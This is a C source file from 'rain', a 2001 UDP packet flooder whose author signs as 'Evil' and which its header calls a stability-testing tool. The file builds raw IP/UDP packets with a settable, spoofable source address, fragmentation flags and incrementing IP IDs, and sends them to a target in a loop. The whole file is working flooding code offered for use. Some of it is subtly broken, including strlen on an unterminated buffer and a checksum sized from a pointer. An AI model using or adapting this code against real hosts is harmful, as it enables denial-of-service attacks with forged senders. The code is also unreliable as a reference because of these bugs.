/*--------------------------------------------------*
 * $Header: /usr/src/Projects/rain/RCS/rain_udp.c,v 1.1 2001/06/11 20:44:09 root Exp root $
 * $Author: root $
 * rain_udp.c
 * rain - by Evil (mystic@tenebrous.com)
 * A flexible packet flooder for testing stability.
 * Copyright(c) 2001
 * Licensed under the GNU General Public License
 *
 * $Log: rain_udp.c,v $
 * Revision 1.1  2001/06/11 20:44:09  root
 * Initial revision
 *
 * Revision 1.1  2001/06/11 02:59:26  root
 * Initial revision
 *
 *-------------------------------------------------*/

#include "rain_common.h"

extern int
udp_shower_normal(struct sockaddr_in *target, struct pkt_info *pkt) {
  int sock;

  buffer = malloc(sizeof(char)*packetsize);
  memset(buffer, 0xFF, (sizeof(char)*packetsize));

  if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
    DieWithError("UDP socket()");

  while(packets_sent < pkt->num) {
    if(sendto(sock,
              buffer,
              strlen(buffer),
              0,
              (struct sockaddr*)target,
              sizeof(struct sockaddr_in)) < strlen(buffer)) DieWithError("sendto()");

   usleep(pkt->delay);
   packets_sent++;
  }

  return 0;
}

extern int
udp_shower(int raw_socket, struct sockaddr_in *source, struct sockaddr_in *target, struct pkt_info *pkt) {
  struct ipudp  *ip_udp;
  struct iphdr      *ip;
  struct udphdr    *udp;

/* We use a global buffer to ward off memory leaks *
 * it will be freed when the program exits         */
  buffer  = malloc(sizeof(char)*packetsize);
  ip_udp = (struct ipudp*)buffer;
  ip = &ip_udp->ip;
  udp = &ip_udp->udp;
  memset(buffer, 0xFF, (sizeof(char)*packetsize));

  pkt->tot_len = (sizeof(struct udphdr) + strlen(buffer));

  udp->source = htons(pkt->sport);
  udp->dest   = htons(pkt->dport);
  udp->len    = htons(pkt->tot_len);
  udp->check  = in_cksum((u_short*)udp,sizeof(udp));

  pkt->tot_len += sizeof(struct iphdr);

  ip->version  = 4;
  ip->ihl      = (sizeof(struct iphdr) >> 2);
  ip->tos      = pkt->tos;
  ip->tot_len  = htons(pkt->tot_len);
  ip->id       = htons(pkt->id);
  if(pkt->frag == 1) {
    ip->frag_off  = htons(pkt->frag_off); /* set fragment offset */
    ip->frag_off |= htons(0x2000);  /* set fragment bit */
  } else {
    ip->frag_off = 0x0;  /* don't fragment */
  }
  ip->ttl      = pkt->ttl;
  ip->protocol = IPPROTO_UDP;
  ip->saddr    = source->sin_addr.s_addr;
  ip->daddr    = target->sin_addr.s_addr;
  ip->check    = in_cksum((u_short*)ip,sizeof(ip));

  while(packets_sent < pkt->num) {
    if(sendto(raw_socket,
              ip_udp,
              pkt->tot_len,
              0,
              (struct sockaddr*)target,
              sizeof(struct sockaddr_in)) < 0) return -1;
    packets_sent++;

    /* for id overloading: */
    if(pkt->id_of == 1) { ip->id++; ip->id = htons(ip->id) ; ip->check = in_cksum((u_short*)ip, sizeof(ip)); }
    usleep(pkt->delay);
  }


  return 0;
}



/* EOF */
